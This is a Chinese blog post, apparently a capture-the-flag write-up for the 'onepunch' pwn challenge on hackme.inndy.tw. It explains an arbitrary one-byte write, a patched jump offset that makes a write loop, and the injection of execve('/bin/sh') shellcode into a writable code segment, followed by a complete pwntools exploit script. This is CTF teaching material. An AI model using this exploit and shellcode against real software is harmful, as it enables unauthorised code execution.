onepunch的wp

最新推荐文章于 2021-12-12 19:51:58 发布
最新推荐文章于 2021-12-12 19:51:58 发布
阅读量2.9k 收藏
点赞数
分类专栏: ctf的wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/78542089
版权

https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了onepunch这个题目感觉还不错,我把wp分享出来,方便大家学习
onepunch的题目要求是: 

nc hackme.inndy.tw 7718

Punch!

这个题目没有太多提示
下面我用ida打开smashthestack这个程序看main函数
image
这个程序在16行有一个任意地址写的漏洞,程序输入的第一个数字是写入的地址,第二个数字是写入的数,但是这个程序只能写一个字节的数据到指定地址
先运行一下程序看一下这个程序干了啥
image
再看看程序开启了哪些保护:
image
看到NX enabled是开启了栈不可执行,而且这个程序还有canary保护,但是这个程序没有开启地址随机化
用gdb加载一下这个程序
image
用vmmap这个指令可以看到代码段可读写,这个题目一下子就简单了,通过任意地址的写,把shellcode写入内存中,然后执行起来,先看一下汇编代码
image
可以看到在任意地址写这个漏洞之后有个条件跳转(0000000000400767),可以控制这个跳转向上跳转到输入的地方(000000000040072C)从而使这段代码变成一个循环,可以看一下jz short loc_400756对应的字节码是75 0a,75是jnz,0a是跳转的偏移,所以就刚刚好通过第一次写操作把这个0a改掉,所以程序开始时输入400768 -61就可以让这个程序变成一个循环了
image
这样通过这个循环把0000000000400769后面的代码变成shellcode就可以了,关于shellcode,里面不能出现255,如果有255的话,shellcode就会被程序截断,我找了半天,找到一个好用的shellcode:https://www.exploit-db.com/exploits/36858/
这样就可以实现exp了: 

#-*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
import binascii
import time
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'amd64', os = 'linux', log_level = 'debug')

def debug(addr = '0x000000000040075d'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)



elf = ELF('/home/h11p/hackme/onepunch')
stack_chk_fail=elf.got['__stack_chk_fail']
print "%x" % stack_chk_fail


#shellcode=asm(shellcraft.amd64.linux.sh())
#str_shellcode=str(binascii.b2a_hex(shellcode))
#https://www.exploit-db.com/exploits/36858/
shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
addr=0x0400769

#io = process('/home/h11p/hackme/onepunch')

io = remote('hackme.inndy.tw', 7718)

payload1 = '400768'
payload2 = '-61'


#debug()

time.sleep(1)
io.recvuntil('Where What?')
io.sendline(payload1)
io.sendline(payload2)
'''
for i in xrange(0,len(str_shellcode),2):
    io.sendline(hex(addr))
    io.sendline(str(int(str_shellcode[i:i+2],16)))
    addr=addr+0x1
'''


for i in shellcode:
    io.sendline(hex(addr))
    io.sendline(str(ord(i)))
    addr = addr + 0x1
io.sendline('4006f3')
io.sendline(str(255))
#io.recv()
io.interactive()

io.close()

效果是:
image

niexinming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
290单词规律 2020-9-29
qq_36209859的博客
09-29 874
题目分析 技术点:该题主要利用字典,键值一一匹配的关系。 在键不存在的时候,值不能存在。在键已经存在的时候,要判断当前键所对应的值 与 字典中已经存在的键对应的值是否相等。确保一一匹配 简单题就是简单题,这道题会考你的逻辑,但是感觉没怎么考虑算法和时间复杂度的问题,对于字典的时间复杂度,我还不是很清楚 易错点:考虑逻辑不周全;另外就是,会把形参弄错,传入的是s,不是str!!! 此处感谢czy,不然一天我可能都会笼罩在这个的阴霾之下 示例: 输入: pattern = “abba”, str = “dog
onepunch:使用Web技术创建演示文稿的命令行界面
04-29
onepunch是用于使用Web技术创建PDF演示文稿的命令行界面。 onepunch是为设计师设计的,它不提供任何默认样式。 设计人员可以编写CSS文件并将其链接到index.html 。 先决条件 要使用onepunch ,您应该在系统中安装了...
wordpress登陆函数:wp_signon()
01-20
【函数介绍】 wp_signon()函数用于授权给用户登陆wordpress并可记住该用户名称。该函数取代了wp_login。WordPress 2.5版本起启用。 【函数使用】 【参数说明】 $credentials (array) (可选) 登陆用户信息. Default: None$secure_cookie (boolean) (可选) 决定是否使用安全cookie。 Default: None注意:如果你没有提供 $credentials, wp_signon 使用 $_POST 参数(键值为 “log”, “pwd” 和 “rememberme”). 【函数返回值】 (obje
hackme inndy pwn onepunch writeup
charlie_heng的专栏
12-31 482
继续来做题目,这次的pwn主要功能是一个任意地址写一个字节,然后就结束。。。。 然后找了半天。。。完全没思路。。。一个字节只能写一次。。。。 然后找了下别人的wp,发现代码段居然可以写,那骚操作就可以有很多了 这里比较写入的字节是否为255,是的话就输出No flag for you jnz loc_400773二进制是\x75\x0a 0a是偏移,我们只要把这个弄成负数,就可以...
hackme pwn onepunch
ACdream
03-14 482
做的题太少了,不知道应该把这种题目如何归类 int __cdecl main(int argc, const char **argv, const char **envp) { …… v5 = __isoc99_scanf("%llx %d", &v6, &v4); if ( v5 != 2 ) return 0; *v6 = v4; …… ...
[A]onepunch(tcache stash&&seccomp)
qq_33590156的博客
08-04 186
程序调用的是calloc,这个函数不会从tcache中取chunk。所以直接add free 重复填满tcache,利用uaf泄露heap和libc tcache per thread struct是来管理链表上堆块的数量的,大小一共是0x250,在heap开头。其中counts一共占0x40,每一个字节都代表一个大小范围正好对应64个entry,第一个字节代表0x10,类推。本题中数一数就是对应0x220的size的地方需要大于6,虽然我们可以申请7个0x220的chunk来让他变为7,可以通过if,但是
One Punch Man Theme-crx插件
04-05
【One Punch Man Theme-crx插件】是一款专为浏览器设计的扩展程序,旨在为用户提供一个与热门动漫《一拳超人》(One Punch Man)相关的主题体验。这款插件允许用户通过简单的点击操作,即可在浏览器环境中感受到《一...
One Punch Man Wallpaper Background New Tab-crx插件
03-14
这是One Punch Man Wallpaper Background New Tab的扩展,该动画使每个人都惊讶 如果您想在观看《一拳超人》时获得完整的体验,并且想要了解Sa玉如何获得权力的真正秘诀,那么我们建议您安装《一拳超人》壁纸背景新...
One Punch Man Season 2 Wallpaper New Tab-crx插件
04-06
这是One Punch Man Season 2 Wallpaper New Tab的延伸,这部动画令所有人赞叹不已 这是对“一拳超人”的扩展。 有史以来最酷的动漫。 如果您已经看过动漫,那么毫无疑问,您应该安装此One Punch Man Season 2 ...
高清壁纸一个冲床男人「HD Wallpapers One Punch Man」-crx插件
03-18
在这个扩展中,你会发现一个冲床男子的主题壁纸。 如果您想更改标签,并且是“一拳超人”的爱好者和爱好者?因此,这些壁纸适合您。 支持语言:Deutsch,English,Français,español,italiano,português (Brasil),...
wordpress-api:wordpress的api接口
04-29
wordpress-api wordpress的api接口 技术支持 接口文档 注意事项 因为本站用了WP-PostViews插件(用来统计文章浏览量的,很好用),所以可以通过wp_postmeta表中的字段来获得文章浏览量,如果没有安装这个插件,那么需要删除SQL语句中与views相关的语句,否则会报错。
史上最详细sql注入wp
热门推荐
lyy0xfff的博客
07-26 2万+
文章目录sql注入wp(史上最详细)前言什么是SQL注入?SQL注入的原理常见的注入方式常见绕过技巧常见防控SQL注入的方法手工查询语句Basic ChallengesLess-1 **Error Based- String**Less-2 Error **Based- Integer**Less-3 Error Based- String (with Twist)Less-4 Error Based- DoubleQuotes String@@Less-5 Double Query- Single Quo
Android 智能指针详解 -- wp
私房菜
12-21 1万+
上一篇关于sp的博文,通过 source code 来解释了sp的功能,sp被称为强指针,但是强引用更贴切点。那么弱引用wp到底有什么功能?与sp有什么区别?这一篇通过 source code 来解释。
WordPress程序代码块高亮显示插件wp-syntax使用
wuxuhui19930209的博客
05-10 2671
WordPress程序代码块高亮显示插件wp-syntax使用 文章来源:http://www.wpdaxue.com/wp-syntax.html 1 2 3 //高亮代码内容.... 其中,lang=”html”表示代码语言为html,请根据自己需要修改; line=”1″ 表示显示行号,如果不需要,去掉即可;escaped=”
WordPress常用函数以及各模块源码文件名
weixin_30737433的博客
07-18 363
折腾了半天,终于把Blog的样式暂定为现在这样了,折腾中用到了许多函数,拿来跟大家分享下o(∩_∩)o WordPress基本模板文件 style.css : CSS(样式表)文件 index.php : 主页模板 archive.php : Archive/Category模板 404.php : 404页面,错误页模板 comments.php : 留言/回复模板 footer.php :...
WordPress详细安装步骤
seo吧
07-22 1万+
本文介绍WordPress(WP)安装方法,虽然很多IDC都会主动帮站长安装,安装过程也很简单,但毕竟是接触WordPress的开始,WP博客做的如何或多或少决定于您对WordPress了解的如何,天缘之前很少写WordPress文章,现在就从最简单的安装开始。WordPress作为极为优秀的PHP开源个人信息平台,已得到大部分站长的认同,虽然天缘博客没有使用WordPress,主要是因为Word
wp(学习总结)
qq_63162684的博客
12-12 8790
三.变量类型 概述:变量类型是指保存在该变量中的数据类型 php对变量类型看的比较淡 1.变量类型简介 1)bool(布尔型) 表达true或false,即真或假 $a=true; var_dump($a); ...
插入视频短代码WordPress函数wp_video_shortcode
sixeit的博客
01-19 1万+
如何给WordPress网站插入视频呢?我们一起看看插入视频短代码WordPress函数wp_video_shortcode。 wp_video_shortcode( array $attr, string $content = ‘’ ) wp_video_shortcode的官方描述,用来构建短代码输出视频。这实现了视频短代码在帖子中显示mp4的功能。 参数说明 $attr (array) (必须) 短代码属性值 ‘src’ (string) 视频资源的URL地址,默认空 ‘height’ (int) 嵌
WP7 示例代码大全
jazywoo_在路上
04-15 1万+
开发WP7,查看     http://msdn.microsoft.com/zh-cn/library/ff431744(v=VS.92).aspx 基本上所有的例子都有 Windows Phone 的代码示例 Windows Phone 开发人员可以下载这些代码示例和应用程序(如 Panorama/Pivot 控件、Bing 地图和单位转换器)来体验 Wind
trutops punch tops 300安装教程
最新发布
11-15
TruTops Punch是一款先进的数控凿孔软件,通过其强大的功能可以实现高效准确的数控凿孔工艺。以下是TruTops Punch Tops 300的安装教程: 1. 首先,确保计算机系统满足TruTops Punch Tops 300的最低要求。例如,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值